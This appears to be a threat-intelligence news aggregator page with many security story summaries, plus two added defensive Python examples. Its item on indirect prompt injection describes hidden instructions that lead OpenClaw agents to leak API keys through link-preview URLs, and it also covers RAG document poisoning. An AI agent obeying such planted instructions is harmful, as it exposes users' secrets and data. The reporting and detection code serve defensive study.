Mallory

Current Events

The latest threat intelligence stories tracked by Mallory.

Today

Nevada Expands Zero Trust and Identity Modernization After Ransomware Attack

Nevada officials said a **major ransomware attack** prompted the state to accelerate cybersecurity and digital modernization efforts, with State CIO **Tim Galluzi** framing the incident as proof that resilience, workforce readiness, and governance must be built into daily operations rather than treated as one-time projects. The state subsequently secured unanimous legislative support and backing from the governor to invest in new cybersecurity tools and infrastructure intended to better protect resident data and critical government systems. Nevada's response emphasizes **zero trust architecture**, stronger **identity and access management**, and broader cross-agency coordination as part of a longer-term modernization strategy. Galluzi described identity as the "new firewall" in an environment where employees, partners, and residents increasingly access systems remotely, and he also highlighted workforce training as a core defensive measure alongside technology upgrades and improved service delivery.

OT Security Pushes Beyond CVSS for Risk Assessment

Operational technology security practitioners are increasingly arguing that **CVSS** is not an adequate way to measure risk in industrial environments, even after the release of **CVSS 4.0**. The reporting says OT defenders view traditional vulnerability severity scoring as poorly suited to environments where safety, uptime, physical process impact, and sector interdependencies matter more than the characteristics of an individual software flaw. Experts cited in the coverage say OT risk assessment needs to focus on **cascading consequences**, cross-sector dependencies, and consequence management rather than trying to refine a vulnerability-centric scoring model. The articles describe a broader shift in OT security thinking: instead of treating CVSS as a universal standard, organizations operating critical infrastructure are being urged to adopt methodologies that better reflect real-world operational impact and the administrative realities of industrial systems.

Lawmakers Seek Investigation Into Former CISA Acting Director's Polygraph and Clearance Handling

House Democrats asked the inspectors general for the intelligence community and the Department of Homeland Security to investigate allegations that former CISA Acting Director **Madhu Gottumukkala** bypassed intelligence access protocols after failing two polygraph examinations tied to entry into a highly sensitive controlled access program. The lawmakers' letter describes a July 2025 effort to obtain access to one of the government's most restricted intelligence compartments, where admission requires both a demonstrated need-to-know and a successful counterintelligence-scope polygraph. The request for an independent probe also cites alleged retaliation against career staff, security clearance suspensions, internal investigations, and possible violations of national security directives. Both reports describe the same developing oversight matter and frame it as a governance and security-clearance controversy inside **CISA**, with lawmakers questioning whether required escalation steps, including notification to the Office of the Director of National Intelligence, were ignored after the failed polygraphs.

Security Risks From OpenClaw ‘Sovereign’ AI Agents With Local Terminal Access

**OpenClaw** (formerly *Clawdbot/Moltbot*) is rapidly spreading as an open-source “sovereign agent” that runs locally and can be granted high-privilege access to a user’s machine (including terminal/code execution), shifting AI from a passive chatbot to an active operator on endpoints. Trend Micro warns this model materially expands the attack surface by combining agent **access to files/commands**, **untrusted inputs** (e.g., messages/web/email), and **exfiltration paths**, and adds a fourth compounding risk—**persistence** via retained memory/state—creating conditions where prompt/instruction manipulation could translate into real system actions and data loss. Adoption is accelerating in China, where Shenzhen’s Longgang district proposed subsidies and an ecosystem to support OpenClaw-driven “one-person companies,” even as regulators and state media flag **data security and privacy** concerns tied to the tool’s ability to access personal and enterprise data. The reporting notes OpenClaw’s plug-in model support (including OpenAI, Anthropic, and Chinese model providers) and highlights official scrutiny amid China’s tightened data-privacy and export-control posture, underscoring that the primary risk is not a single vulnerability but the **operational security implications of deploying locally empowered AI agents** at scale.

U.S. Water Utilities Face New Cybersecurity Funding and Regulatory Push

U.S. policymakers are advancing new cybersecurity measures for the **water and wastewater sector**, with separate federal and state initiatives aimed at improving defenses for under-resourced utilities. A bipartisan federal proposal, the **FLOWS Act**, would provide the Environmental Protection Agency with **$50 million annually** to help small and rural water systems modernize cybersecurity capabilities, digital monitoring, and operational technology support without requiring local cost sharing that often blocks access to federal aid. In New York, state officials finalized what they describe as **first-of-its-kind cyber mandates** for public water systems and paired them with a **$2.5 million grant program** to support risk assessments and security upgrades. The rules establish enforceable requirements for drinking water and wastewater operators to create formal cybersecurity programs, identify risks, and implement technical safeguards for operational systems, reflecting broader concern that the water sector remains a comparatively weak point in U.S. critical infrastructure security.

Operation Atlantic Targets Crypto Approval-Phishing Scams

Law enforcement agencies in the **U.S., U.K., and Canada** launched **Operation Atlantic** to disrupt cryptocurrency fraud schemes based on **approval phishing**, in which victims are tricked into authorizing malicious wallet permissions through fake alerts, pop-ups, or spoofed service messages. Once a victim approves access, attackers can drain assets from the wallet, and recovery is difficult because blockchain transactions are generally irreversible. Authorities said the campaign responds to a broader rise in crypto-enabled fraud, with Chainalysis estimating at least **$14 billion** in on-chain scam revenue in 2025 and warning the total could rise as more illicit wallets are identified. The operation builds on earlier anti-fraud efforts including **Project Atlas**, which identified more than **2,000 compromised wallets** across **14 countries**, disrupted roughly **$70 million** in potential fraud, and froze about **$24 million** in stolen cryptocurrency. The same threat pattern is reflected in phishing lures impersonating platforms such as **OpenSea**, where fake offer alerts, account verification notices, and token airdrop messages attempt to push users into connecting wallets to malicious sites. Those examples illustrate the social-engineering tactics now commonly used in approval-phishing campaigns, alongside increasingly sophisticated content and phishing-as-a-service infrastructure.

Handala Hack Destructive Intrusions Linked to Iran's MOIS

**Handala Hack**, a persona within the **Void Manticore** intrusion set also tracked as **Red Sandstorm** and **Banished Kitten**, has been conducting destructive cyberattacks against organizations in **Israel, Albania, and the United States**. The activity is attributed to Iran’s **Ministry of Intelligence and Security (MOIS)** and is characterized by operations designed to **destroy data rather than collect intelligence**. Check Point’s reporting says the group has operated through multiple personas, including **Handala Hack**, **Karma**, and **Homeland Justice**, with the latter previously used against Albanian government and telecom targets and Handala now appearing in more recent campaigns, including an intrusion affecting medical technology firm **Stryker**. The intrusions typically begin with **compromised VPN credentials**, after which the attackers use **RDP** for remote access, **NetBird** for peer-to-peer tunneling inside victim environments, and **multiple parallel wiping tools** to maximize damage and hinder recovery. Researchers also observed an **AI-assisted PowerShell script** in the wiping toolkit and noted weaker operational security than in earlier activity, including connections traced directly to **Iranian IP addresses** instead of commercial VPN infrastructure. A separate podcast reference aligns with the same incident by describing the attack on **Stryker** as a network disruption that wiped more than **200,000 resources**, reinforcing the destructive nature and scale of the campaign.

Meta Expands Anti-Scam Protections Across WhatsApp, Facebook, and Messenger

**Meta** introduced new anti-scam protections across *WhatsApp*, *Facebook*, and *Messenger* to counter fraud campaigns that rely on social engineering, impersonation, and malicious links. The updates include WhatsApp warnings when device-linking requests show scam-related behavioral signals, such as attempts to trick users into sharing linking codes or QR codes, and Facebook alerts for suspicious friend requests from accounts with indicators like recent creation or no mutual connections. Messenger is also adding AI-driven scam detection to identify patterns associated with impersonation and spoofed links in chats. The changes are part of a broader anti-fraud push in which Meta said it worked with international law enforcement to disable more than **150,000 scam-linked accounts** and support the arrest of **21 individuals**. A separate report on a new cross-industry anti-scam accord involving Meta, Google, Microsoft, Amazon, OpenAI, and others describes a wider effort to share threat intelligence, improve fraud reporting, strengthen transaction verification, and coordinate defenses against scam operations that move across multiple online platforms. A report on **Operation Atlantic** focuses instead on cryptocurrency approval-phishing enforcement by U.S., U.K., and Canadian authorities and is a different story from Meta's platform-specific product rollout.

CISA Adds Wing FTP Server Information Disclosure Flaw to KEV Catalog

**CISA** added **Wing FTP Server** vulnerability `CVE-2025-47813` to its **Known Exploited Vulnerabilities (KEV)** catalog, warning that the flaw is being actively exploited and requiring Federal Civilian Executive Branch agencies to remediate it by **March 30, 2026** under **BOD 22-01**. The issue affects Wing FTP Server versions prior to **7.4.4** and stems from improper handling of an overly long `UID` cookie in `loginok.html`, which can cause the server to disclose the application's full local installation path during web authentication. Although `CVE-2025-47813` is an **information disclosure** issue rather than a standalone remote code execution bug, reporting indicates it can support attacker reconnaissance and may be chained with other Wing FTP Server flaws in broader attack paths. The vendor patched the vulnerability in **May 2025** in version **7.4.4**, alongside **`CVE-2025-47812`** and **`CVE-2025-27889`**, and researcher **Julien Ahrens** previously published proof-of-concept details showing how the path disclosure could aid exploitation. Organizations using Wing FTP Server, not just federal agencies, should verify they are no longer running vulnerable versions and review exposure of web-based authentication components.

Indirect Prompt Injection and Data Exfiltration Risks in Enterprise AI Agents

Security researchers warned that **AI agents and retrieval-augmented generation (RAG) systems** can be turned into data-exfiltration channels when attackers poison inputs or embed malicious instructions in content the model is expected to process. One report described a **0-click indirect prompt injection** against *OpenClaw* agents in which hidden instructions cause the agent to generate an attacker-controlled URL containing sensitive data such as API keys or private conversations in query parameters; messaging platforms like *Telegram* or *Discord* can then automatically request that URL for link previews, silently delivering the data to the attacker. The same reporting noted concerns about insecure defaults that allow agents to browse, execute tasks, and access local files, expanding the blast radius of prompt-injection abuse. Related analysis highlighted that the same core weakness extends beyond standalone agents to **enterprise RAG deployments**, where the integrity of the knowledge base becomes part of the security boundary. If attackers can poison indexed documents in systems such as SharePoint or Confluence, they can manipulate retrieval results and influence model outputs, including security workflows and analyst guidance. Broader commentary on **agentic AI threat convergence** reinforced that prompt engineering is no longer just a productivity technique but an emerging exploit class, with adversaries using prompt injection and context manipulation against AI-enabled security operations. Together, the reporting shows that enterprise AI risk increasingly depends on controlling untrusted content, hardening agent permissions, and treating prompts, retrieved documents, and downstream integrations as attack surfaces.
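The link-preview exfiltration path described above (an agent emits a URL whose query string carries secrets, and the chat platform fetches it) can be checked on the output side before a message leaves the agent. The following is an added example, not code from the original reporting or from the OpenClaw project: it scans text the agent is about to send, and flags any URL that points outside an allow-list of hosts and carries secret-looking query parameters (a secret-like name, or a long high-entropy value). The host names, the allow-list, and the sample agent output are all constructed for the demonstration.

```python
"""Added example (not from the original reporting): an output-side guard
that scans text an agent is about to send to a chat channel and flags
URLs whose query parameters look like they carry secrets to a host
outside an allow-list. Host names and the sample message are constructed."""
import math
import re
from urllib.parse import urlsplit, parse_qsl

URL_RE = re.compile(r"https?://[^\s<>\"')\]]+")
SECRET_NAME_RE = re.compile(r"(key|token|secret|auth|passw|session|cred)", re.I)


def shannon_entropy(s: str) -> float:
    """Bits per character; random key material usually lands around 4-5."""
    if not s:
        return 0.0
    counts: dict[str, int] = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def suspicious_params(query: str) -> list[str]:
    """Reasons a query string looks like it is carrying secret material."""
    reasons = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if SECRET_NAME_RE.search(name):
            reasons.append(f"secret-like parameter name '{name}'")
        if len(value) >= 20 and shannon_entropy(value) >= 3.5:
            reasons.append(f"high-entropy value in '{name}' ({len(value)} chars)")
    return reasons


def find_exfil_urls(text: str, allowed_hosts: set[str]) -> list[tuple[str, list[str]]]:
    """Return (url, reasons) for every URL that points outside
    allowed_hosts and carries secret-looking query data. A caller
    would hold the message (or strip the URL) when this is non-empty,
    since a link preview would otherwise fetch it automatically."""
    hits = []
    for url in URL_RE.findall(text):
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        if host in allowed_hosts:
            continue
        reasons = suspicious_params(parts.query)
        if reasons:
            hits.append((url, reasons))
    return hits


# Constructed sample output from an agent that processed an injected document:
# one legitimate internal link, one link to an unrelated host carrying a
# 32-character hex value under a parameter named "token".
SAMPLE_OUTPUT = (
    "Summary done. Reference: https://docs.example.internal/wiki?page=42 "
    "Also see https://cdn.attacker-example.test/i.png?token=9f3a7c1be42d0a5e6b8c1d2f3e4a5b6c"
)
ALLOWED = {"docs.example.internal"}

if __name__ == "__main__":
    for url, why in find_exfil_urls(SAMPLE_OUTPUT, ALLOWED):
        print(url, "->", "; ".join(why))
```

The entropy threshold is a heuristic, so the guard is a last line of defence rather than a substitute for keeping API keys and conversation history out of the agent's reachable context in the first place; tuning the allow-list and the threshold against real agent traffic is expected.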

Android 17 Feature Rumors and Pixel Notification Summaries

Google's upcoming **Android 17** release is being discussed through early beta builds, leaks, and hands-on coverage of new AI-assisted features. Reported changes include a broader visual redesign tied to *Material 3 Expressive*, possible blur-heavy interface elements, and additional privacy-focused updates expected to be highlighted during the platform's public rollout. Early testing by Google and device makers indicates the next Android version is already in active development ahead of a likely mid-year stable release. One reported capability is **AI-powered notification summaries** on supported Pixel devices, which condense long messages and display them on the lock screen using on-device processing. That feature appears consistent with the broader push toward AI enhancements in Android, but the hands-on report focuses on current Pixel functionality rather than the broader Android 17 leak cycle. The material is **not fluff** because it contains substantive product and platform details with security and privacy implications, even though it is not about a breach, exploit, or vulnerability disclosure.

AI Safety Concerns Around Copilot and ChatGPT Content Controls

Recent reporting highlights **AI safety and governance risks** in mainstream generative AI tools, with concerns spanning both enterprise and consumer use. Gartner warned that **Microsoft 365 Copilot** can amplify existing data exposure problems by making over-shared SharePoint and Microsoft 365 content easier to discover, and also flagged the risk of users distributing inaccurate or culturally inappropriate output without proper review. The guidance emphasized enabling Microsoft’s filters, tightening document permissions, and training users to validate generated content before sharing it. Separate reporting on **OpenAI’s ChatGPT** described internal opposition to expanded “adult mode” capabilities, with former safety personnel reportedly warning that age-gating and content controls were not reliable enough to prevent minors from accessing prohibited material. The article also cited prior filter failures that allegedly allowed graphic erotic content outside intended policy boundaries. Both reports point to a broader governance issue: organizations and platform providers are struggling to keep **content moderation, access controls, and user safeguards** aligned with rapidly expanding AI functionality.

Actively Exploited Browser Sandbox Escape in Microsoft Edge and Related Chromium Update

Microsoft Edge users were urged to update **Stable Channel** installations to version `146.0.3856.59` or later after **CVE-2026-3910** was disclosed as having an available exploit and being actively exploited in the wild. Advisory details indicate the flaw can allow **arbitrary code execution inside a sandbox** through a crafted HTML page, and additional Edge vulnerabilities may also enable **spoofing**, **remote code execution**, and **security restriction bypass**. HKCERT rated the Edge issue as **Extremely High Risk**, underscoring the urgency of patching. A separate advisory for **Google Chrome** addressed **CVE-2026-3909** in Chrome versions prior to `146.0.7680.80`, and CISA added that Chrome flaw to the **Known Exploited Vulnerabilities** catalog. Although both browser advisories were published the same day and concern actively exploited Chromium-based browser vulnerabilities, the Chrome item concerns a **different CVE and a different vendor advisory** and should be treated as a separate incident from the Edge-specific **CVE-2026-3910** disclosure.

Stryker Global Network Disruption Claimed by Iran-Linked Handala Hacktivists

U.S. medical device manufacturer **Stryker** reported a severe, global disruption to its Microsoft/Windows environment following a cyberattack that left employees unable to access corporate systems. Staff reported corporate laptops and phones being wiped, widespread outages of work applications and email, and some login pages displaying the **Handala** logo; the company also routed calls to an automated message citing a “building emergency.” Stryker said it is experiencing a “global network disruption,” believes the incident is contained, and stated it has **no indication of ransomware** while working to restore operations using business continuity measures. A pro-Iran hacktivist group calling itself **Handala** publicly claimed responsibility, framing the attack as retaliation tied to the U.S.-Iran conflict and citing a reported U.S. strike on a girls’ school in Tehran. The group alleged it wiped large numbers of systems and exfiltrated significant data, and reporting indicated at least partial corroboration of system wiping and defacement across Stryker’s global environment. The incident appears to have caused broad operational impact across Stryker’s international footprint, with claims and employee reports indicating both destructive activity (device/server wiping) and potential data theft, though Stryker’s public statement did not confirm exfiltration.

Intuitive Surgical Phishing Breach Exposed Customer and Employee Data

**Intuitive Surgical** disclosed that attackers gained access to internal business administrative systems after stealing an employee's credentials in a phishing attack. The intrusion exposed customer business and contact information, employee data, and corporate files, while the company said the incident did **not** affect operations, hospital customer networks, or its core robotic surgery and digital platforms, including **da Vinci** and **Ion** systems. Intuitive said its robotic systems operate independently from the compromised internal business network and that hospital environments remain separately managed. The company said it took immediate containment steps, launched an ongoing investigation, and notified data privacy regulators. Reporting also noted that Intuitive's network segmentation separated internal IT business systems, manufacturing operations, and digital products, which the company cited as the reason the breach did not spread into production or customer-facing clinical environments. Public details remain limited, including when the phishing attack occurred and when it was detected, but both reports indicate the incident was confined to internal business applications rather than operational or medical device infrastructure.

GlassWorm Supply-Chain Campaign Abuses Open VSX Extension Dependencies

**GlassWorm** expanded its software supply-chain campaign in the Open VSX ecosystem by publishing dozens of seemingly benign extensions that later pull in malicious components through the `extensionPack` and `extensionDependencies` manifest fields. Socket reported **73 malicious Open VSX extensions** linked to the operation, while another report cited **72** newly identified packages, reflecting the same campaign and detection set. The technique allows attackers to establish trust with an initial standalone-looking extension and then, in a later update, silently install a hidden GlassWorm loader as a transitive dependency, defeating one-time review of the original package. The malicious listings impersonate common developer tools including formatters, linters, language support packages, and AI coding assistants to maximize installation volume. The campaign preserves earlier **GlassWorm** tradecraft while improving evasion and resilience. Reported behaviors include staged JavaScript execution, **Russian locale/timezone geofencing**, use of **Solana transaction memos** as dead drops, and in-memory execution of follow-on code. Socket also observed infrastructure and loader changes, including reuse of `45[.]32[.]150[.]251`, addition of `45[.]32[.]151[.]157` and `70[.]34[.]242[.]255`, migration to a new Solana wallet, and a shift from a static AES-wrapped loader to heavier **RC4/base64/string-array obfuscation** with decryption material moved into HTTP response headers such as `ivbase64` and `secretkey`. This is a substantive threat-intelligence and vulnerability-exposure story, not fluff, because it documents an active malicious campaign, specific delivery mechanisms, and concrete infrastructure tied to developer-targeted compromise.
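The delivery trick above, a clean initial extension that later pulls in a loader through `extensionPack` or `extensionDependencies`, defeats a one-time review of the package, so a defender wants to re-check those manifest fields on every update. The following is an added example, not code from Socket or the original reporting: it compares two versions of an extension manifest (`package.json`) and reports every dependency the new version introduces, marking separately those published under a different publisher than the extension itself. The two manifests, the publisher names, and the extension ids are constructed for the demonstration.

```python
"""Added example (not from the original report or from Socket's tooling):
flag newly introduced transitive dependencies between two versions of a
VS Code / Open VSX extension manifest. The fields checked, extensionPack
and extensionDependencies, are the ones the campaign above abuses; the
sample manifests below are constructed for the demo."""
import json
from dataclasses import dataclass

DEPENDENCY_FIELDS = ("extensionPack", "extensionDependencies")


@dataclass(frozen=True)
class Finding:
    field: str
    extension_id: str  # "publisher.name" as used in extension manifests
    reason: str


def _deps(manifest: dict, field: str) -> set[str]:
    """Extension ids listed under one dependency field, lower-cased."""
    value = manifest.get(field, [])
    if not isinstance(value, list):
        raise ValueError(f"{field} must be a list of extension ids")
    return {str(v).lower() for v in value}


def review_update(old: dict, new: dict) -> list[Finding]:
    """Return one Finding per dependency that the new manifest adds.
    A dependency under a different publisher than the extension itself
    is called out separately, because that is what turns a
    standalone-looking extension into a loader for someone else's code."""
    findings = []
    publisher = str(new.get("publisher", "")).lower()
    for field in DEPENDENCY_FIELDS:
        added = _deps(new, field) - _deps(old, field)
        for ext_id in sorted(added):
            dep_publisher = ext_id.split(".", 1)[0]
            reason = ("new dependency, same publisher" if dep_publisher == publisher
                      else "new dependency from a different publisher")
            findings.append(Finding(field, ext_id, reason))
    return findings


# Constructed sample: version 1.0.0 shipped with no dependencies; the
# 1.0.1 update adds one pack entry from the same publisher and one
# dependency from an unrelated publisher.
OLD_MANIFEST = json.loads("""{
  "name": "example-formatter", "publisher": "example-dev",
  "version": "1.0.0", "engines": {"vscode": "^1.80.0"}
}""")
NEW_MANIFEST = json.loads("""{
  "name": "example-formatter", "publisher": "example-dev",
  "version": "1.0.1", "engines": {"vscode": "^1.80.0"},
  "extensionPack": ["example-dev.example-themes"],
  "extensionDependencies": ["other-pub.helper-runtime"]
}""")

if __name__ == "__main__":
    for f in review_update(OLD_MANIFEST, NEW_MANIFEST):
        print(f"[{f.field}] {f.extension_id}: {f.reason}")
```

Run against the manifest stored from the version that was originally reviewed and the manifest of the incoming update; any finding means the update pulls in code the earlier review never looked at, and a cross-publisher finding deserves the same scrutiny as a brand-new extension.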

Google Patches Two Actively Exploited Chrome Zero-Days

Google released an urgent **Chrome stable channel** update to address two **high-severity zero-day vulnerabilities** that the company says are being **actively exploited in the wild**. The patched versions are `146.0.7680.75/76` for **Windows and macOS** and `146.0.7680.75` for **Linux**, with rollout occurring over days to weeks. The flaws were reported internally by Google on March 10, and Google said access to additional bug details may remain restricted until most users have updated. The two vulnerabilities are **CVE-2026-3909**, an **out-of-bounds write in Skia**, and **CVE-2026-3910**, an **inappropriate implementation in V8**. Both components are high-value targets because they sit in Chrome’s rendering and JavaScript execution paths, creating opportunities for malicious webpages to trigger memory corruption or unsafe browser behavior that could lead to **arbitrary code execution**. The update is a substantive security release rather than routine product news because Google explicitly confirmed that exploits exist for both issues, making rapid patching a priority for enterprises and end users.

INTERPOL Operation Synergia III Disrupts Global Phishing and Fraud Infrastructure

**INTERPOL** said **Operation Synergia III** led to the arrest of **94 suspects**, the seizure of **212 devices and servers**, and the sinkholing or takedown of more than **45,000 malicious IP addresses** tied to cybercrime infrastructure across **72 countries and territories**. The operation ran from July 2025 through January 2026 and targeted infrastructure supporting **phishing, malware, ransomware, romance scams, credit card fraud, and related online fraud**. Authorities said **110 additional individuals remain under investigation**, underscoring that follow-on enforcement activity is still ongoing. Preliminary case details show broad international participation and a focus on both technical infrastructure and fraud operators. In **Macau**, investigators identified more than **33,000 phishing and fraudulent websites**, including fake casino, banking, government, payment, and other critical-service sites used to steal credentials and payment data. In **Bangladesh**, authorities arrested **40 suspects** and seized **134 devices** linked to loan scams, employment scams, identity theft, and credit card fraud, while in **Togo** police arrested **10 suspects** tied to a fraud ring whose members split responsibilities between account compromise and social-engineering schemes such as romance and sextortion scams. The reporting describes a coordinated law-enforcement disruption of active criminal infrastructure rather than a vendor announcement or generic security guidance.

Chinese Espionage Campaign Targets Southeast Asian Militaries With AppleChris and MemFun

A **China-linked cyber espionage campaign** targeted military organizations in Southeast Asia, with Palo Alto Networks Unit 42 tracking the activity as **CL-STA-1087**. The operation reportedly dates back to at least 2020 and focused on **high-value intelligence collection** rather than broad data theft, including files related to military capabilities, organizational structures, official meeting records, and cooperation with Western armed forces. Researchers said the campaign showed the hallmarks of a patient, state-backed intrusion set, including tailored delivery, defense evasion, stable infrastructure, and custom malware used to maintain long-term access. The attackers used backdoors identified as **AppleChris** and **MemFun**, along with a credential harvester called **Getpass**. Unit 42 observed suspicious **PowerShell** activity that slept for six hours before establishing reverse shells to attacker-controlled C2 infrastructure, after which AppleChris variants were deployed across endpoints following lateral movement to preserve persistence and reduce detection. One additional reference briefly mentions **Chinese-nexus operators** pivoting rapidly against regional targets using conflict-themed lures, but the rest of the material is unrelated newsletter, opinion, podcast, or best-practice content rather than reporting on the same espionage operation.

Coruna iPhone Exploit Kit Linked to Russian Espionage and Criminal Use

Researchers reported that the **Coruna** iOS exploitation framework contains full exploit chains and roughly **23 exploits** targeting iPhones running **iOS 13 through 17.2/17.2.1**, and that it has been used by multiple threat actors, including **UNC6353**, a suspected Russian espionage group conducting watering-hole attacks against Ukrainian users, and **UNC6691**, a financially motivated China-based actor. The toolkit, also referred to as **CryptoWaters**, has been described as a rare case of **nation-state-grade iPhone exploitation** appearing in broader criminal operations, with post-exploitation activity including the **PLASMAGRID** payload and persistence through a process identified as `com.apple.assistd` that injects into the `powerd` daemon running as root. Reporting also highlighted competing views on the toolkit's origin. One account said evidence suggests parts of Coruna may have originated from **Trenchant**, a hacking and surveillance division of **L3Harris**, and later leaked into the wider ecosystem, ultimately reaching foreign intelligence services and cybercriminals. However, technical threat research noted that the **definitive origin remains unconfirmed**, even as analysts observed reuse of vulnerabilities associated with **Operation Triangulation** and CISA added **`CVE-2023-41974`** to the **Known Exploited Vulnerabilities** catalog after Google's publication. The story is substantive threat intelligence, not fluff, because it concerns an active exploit framework, real-world exploitation, and possible proliferation of advanced offensive capabilities.

AI-Enabled Fraud Scams Industrialized by Transnational Criminal Networks

**Transnational criminal networks** are increasingly industrializing online fraud with **AI-enabled social engineering**, according to reporting on scam compounds in Southeast Asia, an Interpol assessment, and policy commentary tied to a new US executive order. Fraud operations linked to *pig-butchering* and romance scams are using generative AI to improve language quality, deepfakes to impersonate trusted people, and low-cost "deepfake-as-a-service" offerings to scale deception. Interpol said AI-assisted fraud is **4.5 times more profitable** than non-AI schemes, while broader reporting describes these operations as structured, multinational enterprises that function like businesses and increasingly rely on automation, synthetic identities, and persuasive impersonation at scale. Reporting from Cambodia and the wider region shows scam operators are now recruiting "**AI face models**" to appear on high-volume deepfake video calls, including applicants from multiple countries seeking work in compounds associated with trafficking-linked fraud operations. The same ecosystem has been described as part of a broader organized-crime model involving forced labor, cryptocurrency investment scams, romance fraud, and impersonation schemes targeting victims globally. One reference on calculating AI ROI in enterprise cybersecurity is **not about this fraud campaign ecosystem**, and an EU sanctions announcement concerns separate state-linked cyber incidents rather than financially motivated AI-enabled fraud.

Olympic Cybersecurity Lessons and Incident Response Preparedness

Coverage focused on **cybersecurity lessons from major sporting events**, especially the Olympics, with emphasis on how organizers prepared for and responded to threats surrounding **Paris 2024** and **Milan Cortina 2026**. The substantive reporting describes the Olympics as a high-value target for phishing, malware, spoofed domains, DDoS, hacktivism, and state-backed activity, and notes that Italian authorities said they blocked attacks targeting foreign ministry offices, Olympics websites, and hotels in the Cortina d'Ampezzo area before the 2026 Games opened. The material is largely **feature and interview content** rather than a single breaking incident, but it contains relevant operational detail about defending large public events through coordination across agencies, partners, and sponsors, and through mature **risk management** and **incident response** programs. One reference is not part of this story because it is a general weekly news roundup covering unrelated issues such as Chrome zero-days, router botnets, and an AWS breach, rather than Olympic event security.

FBI Investigates Malware-Laced Games Distributed on Steam

The **FBI** is seeking victims as it investigates a suspected cybercriminal who published multiple **malware-tainted games** on **Steam**, using seemingly legitimate titles as Trojan horses to infect players' systems. The games named by the agency include **BlockBlasters/BlockBasters, Chemia, Dashverse/DashFPS, Lampy, Lunara, PirateFi, and Tokenova**, and were reportedly available between **2024 and 2026**. Both reports indicate the titles were functional enough to appear legitimate, but were designed to deliver malware and compromise users after installation. The reported impact includes **account compromise, information theft, and crypto-wallet draining**, with one cited case involving the theft of **$32,000 in cancer donations** from a streamer after exposure to one of the malicious games. The investigation suggests the listed titles may have been developed by the **same threat actor**, and that the number of affected users remains unknown. The case also highlights ongoing weaknesses in marketplace screening, as malicious games were able to reach Steam users before being removed by **Valve**.
